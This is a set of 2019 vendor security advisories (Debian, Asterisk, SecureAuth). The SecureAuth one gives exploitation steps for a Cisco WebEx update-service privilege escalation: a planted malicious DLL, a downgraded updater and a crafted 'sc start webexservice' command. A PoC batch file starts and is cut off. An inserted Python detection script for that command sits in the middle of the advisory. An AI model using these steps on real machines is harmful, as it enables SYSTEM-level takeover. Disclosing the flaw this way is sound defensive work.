[SECURITY] [DSA 4400-1] openssl1.0 security update
Debian Security Advisory DSA-4400-1                   secur...@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
February 28, 2019                     https://www.debian.org/security/faq

Package        : openssl1.0
CVE ID         : CVE-2019-1559

Juraj Somorovsky, Robert Merget and Nimrod Aviram discovered a padding
oracle attack in OpenSSL.

For the stable distribution (stretch), this problem has been fixed in
version 1.0.2r-1~deb9u1.

We recommend that you upgrade your openssl1.0 packages.

For the detailed security status of openssl1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openssl1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] [DSA 4399-1] ikiwiki security update
Debian Security Advisory DSA-4399-1                   secur...@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
February 28, 2019                     https://www.debian.org/security/faq

Package        : ikiwiki
CVE ID         : CVE-2019-9187

Joey Hess discovered that the aggregate plugin of the Ikiwiki wiki
compiler was susceptible to server-side request forgery, resulting in
information disclosure or denial of service.

For the stable distribution (stretch), this problem has been fixed in
version 3.20170111.1.

We recommend that you upgrade your ikiwiki packages.

For the detailed security status of ikiwiki please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/ikiwiki

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] [DSA 4398-1] php7.0 security update
Debian Security Advisory DSA-4398-1                   secur...@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
February 28, 2019                     https://www.debian.org/security/faq

Package        : php7.0
CVE ID         : CVE-2019-9020 CVE-2019-9021 CVE-2019-9022 CVE-2019-9023
                 CVE-2019-9024

Multiple security issues were found in PHP, a widely-used open source
general purpose scripting language: Multiple out-of-bounds memory
accesses were found in the xmlrpc, mbstring and phar extensions and
the dns_get_record() function.

For the stable distribution (stretch), these problems have been fixed in
version 7.0.33-0+deb9u2.

We recommend that you upgrade your php7.0 packages.

For the detailed security status of php7.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/php7.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
AST-2019-001: Remote crash vulnerability with SDP protocol violation
Asterisk Project Security Advisory - AST-2019-001

Product              Asterisk
Summary              Remote crash vulnerability with SDP protocol violation
Nature of Advisory   Denial Of Service
Susceptibility       Remote Authenticated Sessions
Severity             Low
Exploits Known       No
Reported On          January 24, 2019
Reported By          Sotiris Ganouris
Posted On            November 14, 2018
Last Updated On
Advisory Contact     gjoseph AT digium DOT com
CVE Name             CVE-2019-7251

Description
    When Asterisk makes an outgoing call, a very specific SDP protocol
    violation by the remote party can cause Asterisk to crash.

Resolution
    Upgrade Asterisk to a fixed version.

Affected Versions
    Product                  Release Series
    Asterisk Open Source     15.x              All releases
    Asterisk Open Source     16.x              All releases

Corrected In
    Product                  Release
    Asterisk Open Source     15.7.2
    Asterisk Open Source     16.2.1

Patches
    SVN URL                                                            Revision
    http://downloads.asterisk.org/pub/security/AST-2019-001-15.diff    Asterisk 15
    http://downloads.asterisk.org/pub/security/AST-2019-001-16.diff    Asterisk 16

Links
    https://issues.asterisk.org/jira/browse/ASTERISK-28260

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-001.pdf and
http://downloads.digium.com/pub/security/AST-2019-001.html

Revision History
    Date                 Editor           Revisions Made
    January 31, 2019     George Joseph    Initial revision

Asterisk Project Security Advisory - AST-2019-001
Copyright (c) 2018 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
[SECURITY] [DSA 4397-1] ldb security update
Debian Security Advisory DSA-4397-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
February 28, 2019                     https://www.debian.org/security/faq

Package        : ldb
CVE ID         : CVE-2019-3824

Garming Sam reported an out-of-bounds read in the ldb_wildcard_compare()
function of ldb, a LDAP-like embedded database, resulting in denial of
service.

For the stable distribution (stretch), this problem has been fixed in
version 2:1.1.27-1+deb9u1.

We recommend that you upgrade your ldb packages.

For the detailed security status of ldb please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/ldb

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

1. *Advisory Information*

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
Advisory ID: CORE-2018-0012
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
video are clear, and screen sharing is easier than ever. We help you
forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Cisco Webex Meetings Desktop App v33.6.4.15
. Cisco Webex Meetings Desktop App v33.6.5.2
. Cisco Webex Meetings Desktop App v33.7.0.694
. Cisco Webex Meetings Desktop App v33.7.1.15
. Cisco Webex Meetings Desktop App v33.7.2.24
. Cisco Webex Meetings Desktop App v33.7.3.7
. Cisco Webex Meetings Desktop App v33.8.0.779
. Cisco Webex Meetings Desktop App v33.8.1.13
. Cisco Webex Meetings Desktop App v33.8.2.7

Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Cisco informed that the vulnerability is fixed in Cisco Webex Meetings
Desktop App releases 33.6.6 and 33.9.1.

In addition, Cisco published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation*

[CVE-2019-1674] The update service of Cisco Webex Meetings Desktop App
for Windows does not properly validate version numbers of new files. An
unprivileged local attacker could exploit this vulnerability by invoking
the update service command with a crafted argument and folder. This will
allow the attacker to run arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying the atgpcdec.dll binary to
a local attacker-controlled folder and renaming it to atgpcdec.7z. Then,
a previous version of the ptUpdate.exe file must be compressed as 7z and
copied to the controlled folder. Also, a malicious dll must be placed in
the same folder, named vcruntime140.dll and compressed as
vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the
controlled folder for the update binary (ptUpdate.exe) to treat our
files as a normal update. To gain privileges, the attacker must start
the service with the command line:

    sc start webexservice WebexService 1 989898 "attacker-controlled-path"

Proof of Concept:

The following proof of concept performs a 2 step attack, since starting
from version 33.8.X, the application enforces the checking of signatures
for all the downloaded binaries. This 2 step attack works against all
the mentioned vulnerable packages. Notice that you'll need the previous
versions of the ptUpdate.exe executable. Those versions are:
3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last
step. To exploit versions prior to 33.8.X, only one step is required
(the last step in this PoC).
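A defender-side check for the invocation described in 7.1, added here as an example and not part of the SecureAuth advisory: it flags process-creation command lines (for example Sysmon Event ID 1 or Security event 4688 with command-line logging) that start webexservice through sc with caller-supplied arguments. The sample records, the TRUSTED_DIRS list and the function names are assumptions constructed for illustration.

```python
import re

SERVICE = "webexservice"  # service name taken from the advisory's command line
# Assumption: site-specific folders an update may legitimately be staged in.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
PATHLIKE = re.compile(r"^(?:[a-zA-Z]:\\|\\\\|\.)")  # drive, UNC or relative path

def tokens(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]

def classify(cmdline):
    """Return 'high', 'review' or None for one process-creation command line."""
    t = tokens(cmdline)
    if len(t) < 3 or t[0].lower().rsplit("\\", 1)[-1] not in ("sc", "sc.exe"):
        return None
    args = t[1:]
    if args[0].startswith("\\\\"):      # sc accepts an optional \\server first
        args = args[1:]
    if len(args) < 2 or args[0].lower() != "start" or args[1].lower() != SERVICE:
        return None
    extra = args[2:]
    if not extra:
        return None                      # plain start, nothing caller-supplied
    paths = [a for a in extra if PATHLIKE.match(a)]
    # A folder argument outside the trusted list matches the advisory's pattern.
    if any(not p.lower().startswith(TRUSTED_DIRS) for p in paths):
        return "high"
    return "review"                      # arguments passed, still worth a look

# Constructed process-creation records; users and paths are made up.
SAMPLE_EVENTS = [
    {"user": "CORP\\alice",
     "cmd": 'sc start webexservice WebexService 1 989898 "C:\\Users\\alice\\AppData\\Local\\Temp\\upd"'},
    {"user": "CORP\\bob", "cmd": "C:\\Windows\\System32\\sc.exe start webexservice"},
    {"user": "CORP\\carol", "cmd": "sc.exe query webexservice"},
    {"user": "CORP\\dave",
     "cmd": 'sc.exe START WebExService WebexService 1 989898 "C:\\Program Files\\Webex\\stage"'},
]

def triage(events):
    """Return (user, severity) for every event that classify() flags."""
    return [(e["user"], v) for e in events if (v := classify(e["cmd"]))]

if __name__ == "__main__":
    for user, severity in triage(SAMPLE_EVENTS):
        print(severity, user)
```

A hit is a lead rather than proof of exploitation; confirming it means checking the installed Desktop App version against the fixed releases 33.6.6 and 33.9.1 named in section 5.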
Batch file:

/-----
@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the attack. It
REM